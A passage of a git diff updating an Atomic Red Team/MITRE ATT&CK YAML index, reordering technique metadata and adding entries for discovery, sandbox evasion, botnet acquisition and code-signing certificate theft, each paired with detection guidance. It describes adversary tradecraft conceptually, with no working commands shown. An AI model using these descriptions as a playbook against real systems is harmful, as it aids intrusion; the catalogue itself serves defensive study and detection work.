- Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.
+ name: Process Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_version: '1.2'
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_system_requirements:
+ - Administrator, SYSTEM may provide better process ownership details
+ x_mitre_is_subtechnique: false
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
@@ -41490,9 +46293,21 @@ discovery:
elevation_required: true
T1018:
technique:
- id: attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote System Discovery
+ created: '2017-05-31T21:30:28.187Z'
+ modified: '2020-09-17T12:26:53.669Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1018
+ url: https://attack.mitre.org/techniques/T1018
+ - external_id: CAPEC-292
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/292.html
description: "Adversaries may attempt to get a listing of other systems by IP
address, hostname, or other logical identifier on a network that may be used
for Lateral Movement from the current system. Functionality could exist within
@@ -41503,76 +46318,31 @@ discovery:
or /etc/hosts) in order to discover the hostname to IP address
mappings of remote systems. \n\nSpecific to macOS, the bonjour
protocol exists to discover additional Mac-based systems within the same broadcast
- domain.\n\nWithin IaaS (Infrastructure as a Service) environments, remote
- systems include instances and virtual machines in various states, including
- the running or stopped state. Cloud providers have created methods to serve
- information about remote systems, such as APIs and CLIs. For example, AWS
- provides a DescribeInstances API within the Amazon EC2 API and
- a describe-instances command within the AWS CLI that can return
- information about all instances within an account.(Citation: Amazon Describe
- Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud
- SDK CLI provides the gcloud compute instances list command to
- list all Google Compute Engine instances in a project, and Azure's CLI az
- vm list lists details of virtual machines.(Citation: Google Compute
- Instances)(Citation: Azure VM List)"
- external_references:
- - source_name: mitre-attack
- external_id: T1018
- url: https://attack.mitre.org/techniques/T1018
- - external_id: CAPEC-292
- source_name: capec
- url: https://capec.mitre.org/data/definitions/292.html
- - source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
- - source_name: Amazon Describe Instances CLI
- url: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
- description: Amazon. (n.d.). describe-instances. Retrieved May 26, 2020.
- - source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- description: Google. (n.d.). gcloud compute instances list. Retrieved May
- 26, 2020.
- - source_name: Azure VM List
- url: https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest
- description: Microsoft. (n.d.). az vm. Retrieved May 26, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-05-26T15:02:19.656Z'
- created: '2017-05-31T21:30:28.187Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Praetorian
- - RedHuntLabs, @redhuntlabs
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - GCP
- - Azure
- - AWS
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- In cloud environments, the usage of particular commands or APIs to request information about remote systems may be common. Where possible, anomalous usage of these commands and APIs or the usage of these commands and APIs in conjunction with additional unexpected commands may be a sign of malicious use. Logging methods provided by cloud providers that capture history of CLI commands executed or API usage may be utilized for detection.
+ domain."
+ name: Remote System Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735
+ x_mitre_version: '3.0'
x_mitre_data_sources:
- - Azure activity logs
- - Stackdriver logs
- - AWS CloudTrail logs
- Network protocol analysis
- Process monitoring
- Process use of network
- Process command-line parameters
- x_mitre_version: '2.1'
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_contributors:
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_is_subtechnique: false
identifier: T1018
atomic_tests:
- name: Remote System Discovery - net
@@ -41831,10 +46601,13 @@ discovery:
- source_name: mitre-attack
external_id: T1518.001
url: https://attack.mitre.org/techniques/T1518/001
+ - external_id: CAPEC-581
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/581.html
- source_name: Expel IO Evil in AWS
url: https://expel.io/blog/finding-evil-in-aws/
- description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April
- 28). Finding Evil in AWS. Retrieved June 25, 2020.
+ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
+ Evil in AWS. Retrieved June 25, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -41850,7 +46623,7 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-06-29T17:32:24.787Z'
+ modified: '2020-09-16T19:36:16.978Z'
created: '2020-02-21T21:16:18.066Z'
x_mitre_data_sources:
- Stackdriver logs
@@ -41867,7 +46640,7 @@ discovery:
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
@@ -41958,9 +46731,12 @@ discovery:
T1518:
technique:
external_references:
- - external_id: T1518
- source_name: mitre-attack
+ - source_name: mitre-attack
+ external_id: T1518
url: https://attack.mitre.org/techniques/T1518
+ - external_id: CAPEC-580
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/580.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -41974,10 +46750,10 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-06-29T19:34:39.136Z'
+ modified: '2020-09-16T19:36:17.133Z'
created: '2019-09-16T17:52:44.147Z'
x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_permissions_required:
- User
- Administrator
@@ -42778,9 +47554,21 @@ discovery:
name: powershell
T1007:
technique:
- id: attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: System Service Discovery
+ created: '2017-05-31T21:30:21.315Z'
+ modified: '2020-03-15T01:05:08.805Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1007
+ external_id: T1007
+ - external_id: CAPEC-574
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/574.html
description: Adversaries may try to get information about registered services.
Commands that may obtain information about services using operating system
utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057),
@@ -42789,36 +47577,24 @@ discovery:
from [System Service Discovery](https://attack.mitre.org/techniques/T1007)
during automated discovery to shape follow-on behaviors, including whether
or not the adversary fully infects the target and/or attempts specific actions.
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1007
- external_id: T1007
- - external_id: CAPEC-574
- source_name: capec
- url: https://capec.mitre.org/data/definitions/574.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-15T01:05:08.805Z'
- created: '2017-05-31T21:30:21.315Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
+ name: System Service Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '1.1'
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: false
identifier: T1007
atomic_tests:
- name: System Service Discovery
@@ -42942,14 +47718,15 @@ discovery:
name: powershell
T1497.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Time Based Evasion
+ created: '2020-03-06T21:11:11.225Z'
+ modified: '2020-07-01T16:32:02.532Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
description: "Adversaries may employ various time-based methods to detect and
avoid virtualization and analysis environments. This may include timers or
other triggers to avoid a virtual machine environment (VME) or sandbox, specifically
@@ -42960,22 +47737,23 @@ discovery:
Delays may also be based on waiting for specific victim conditions to be met
(ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104)
to avoid analysis and scrutiny. "
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-07-01T16:32:02.532Z'
- created: '2020-03-06T21:11:11.225Z'
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
- - Anti-virus
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ name: Time Based Evasion
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.003
+ url: https://attack.mitre.org/techniques/T1497/003
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -42985,15 +47763,13 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Deloitte Threat Library Team
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ - Anti-virus
atomic_tests: []
T1497.002:
technique:
@@ -43072,19 +47848,15 @@ discovery:
atomic_tests: []
T1497:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Virtualization/Sandbox Evasion
+ created: '2019-04-17T22:22:24.505Z'
+ modified: '2020-07-01T16:32:02.272Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
description: "Adversaries may employ various means to detect and avoid virtualization
and analysis environments. This may include changing behaviors based on the
results of checks for the presence of artifacts indicative of a virtual machine
@@ -43101,16 +47873,35 @@ discovery:
if it is in an analysis environment. Additional methods include use of sleep
timers or loops within malware code to avoid operating within a temporary
sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n"
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-07-01T16:32:02.272Z'
- created: '2019-04-17T22:22:24.505Z'
- x_mitre_version: '1.2'
+ name: Virtualization/Sandbox Evasion
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497
+ url: https://attack.mitre.org/techniques/T1497
+ - source_name: Unit 42 Pirpi July 2015
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -43121,22 +47912,3027 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
+ x_mitre_version: '1.2'
+ atomic_tests: []
+resource-development:
+ T1583:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583
+ url: https://attack.mitre.org/techniques/T1583
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Acquire Infrastructure
+ description: |-
+ Before compromising a victim, adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
+
+ Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
+ id: attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T17:59:17.606Z'
+ created: '2020-09-30T16:37:40.271Z'
+ x_mitre_version: '1.0'
x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.005
+ url: https://attack.mitre.org/techniques/T1583/005
+ - source_name: Norton Botnet
+ url: https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html
+ description: Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.
+ - source_name: Imperva DDoS for Hire
+ url: https://www.imperva.com/learn/ddos/booters-stressers-ddosers/
+ description: Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October
+ 4, 2020.
+ - source_name: Krebs-Anna
+ description: Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai
+ Worm Author?. Retrieved May 15, 2017.
+ url: https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/
+ - source_name: Krebs-Bazaar
+ description: Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service
+ Bazaar. Retrieved May 15, 2017.
+ url: https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/
+ - source_name: Krebs-Booter
+ description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
+ Numbered?. Retrieved May 15, 2017.
+ url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Botnet
+ description: 'Before compromising a victim, adversaries may buy, lease, or rent
+ a network of compromised systems that can be used during targeting. A botnet
+ is a network of compromised systems that can be instructed to perform coordinated
+ tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to
+ use an existing botnet from a booter/stresser service. With a botnet at their
+ disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
+ or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation:
+ Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)'
+ id: attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-05T02:15:01.325Z'
+ created: '2020-10-01T00:49:05.467Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint
+ Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.005
+ url: https://attack.mitre.org/techniques/T1584/005
+ - source_name: Norton Botnet
+ url: https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html
+ description: Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.
+ - source_name: Imperva DDoS for Hire
+ url: https://www.imperva.com/learn/ddos/booters-stressers-ddosers/
+ description: Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October
+ 4, 2020.
+ - source_name: Dell Dridex Oct 2015
+ url: https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
+ description: Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015,
+ October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May
+ 31, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Botnet
+ description: 'Before compromising a victim, adversaries may compromise numerous
+ third-party systems to form a botnet that can be used during targeting. A
+ botnet is a network of compromised systems that can be instructed to perform
+ coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting
+ a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire),
+ adversaries may build their own botnet by compromising numerous third-party
+ systems. Adversaries may also conduct a takeover of an existing botnet, such
+ as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex
+ Oct 2015) With a botnet at their disposal, adversaries may perform follow-on
+ activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
+ or Distributed Denial of Service (DDoS).'
+ id: attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:03:23.751Z'
+ created: '2020-10-01T00:58:35.269Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint
+ Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587.002
+ url: https://attack.mitre.org/techniques/T1587/002
+ - url: https://en.wikipedia.org/wiki/Code_signing
+ description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
+ 31, 2016.
+ source_name: Wikipedia Code Signing
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Code Signing Certificates
+ description: |-
+ Before compromising a victim, adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
+
+ Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.
+ id: attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-15T01:15:54.945Z'
+ created: '2020-10-01T01:41:08.652Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002)
+ or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.003
+ url: https://attack.mitre.org/techniques/T1588/003
+ - url: https://en.wikipedia.org/wiki/Code_signing
+ description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
+ 31, 2016.
+ source_name: Wikipedia Code Signing
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Code Signing Certificates
+ description: |-
+ Before compromising a victim, adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
+
+ Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.
+ id: attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:22:21.007Z'
+ created: '2020-10-01T02:11:47.237Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002)
+ or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1586:
+ technique:
+ id: attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a
+ description: "Before compromising a victim, adversaries may compromise accounts
+ with services that can be used during targeting. For operations incorporating
+ social engineering, the utilization of an online persona may be important.
+ Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)),
+ adversaries may compromise existing accounts. Utilizing an existing persona
+ may engender a level of trust in a potential victim if they have a relationship,
+ or knowledge of, the compromised persona. \n\nA variety of methods exist for
+ compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598),
+ purchasing credentials from third-party sites, or by brute forcing credentials
+ (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior
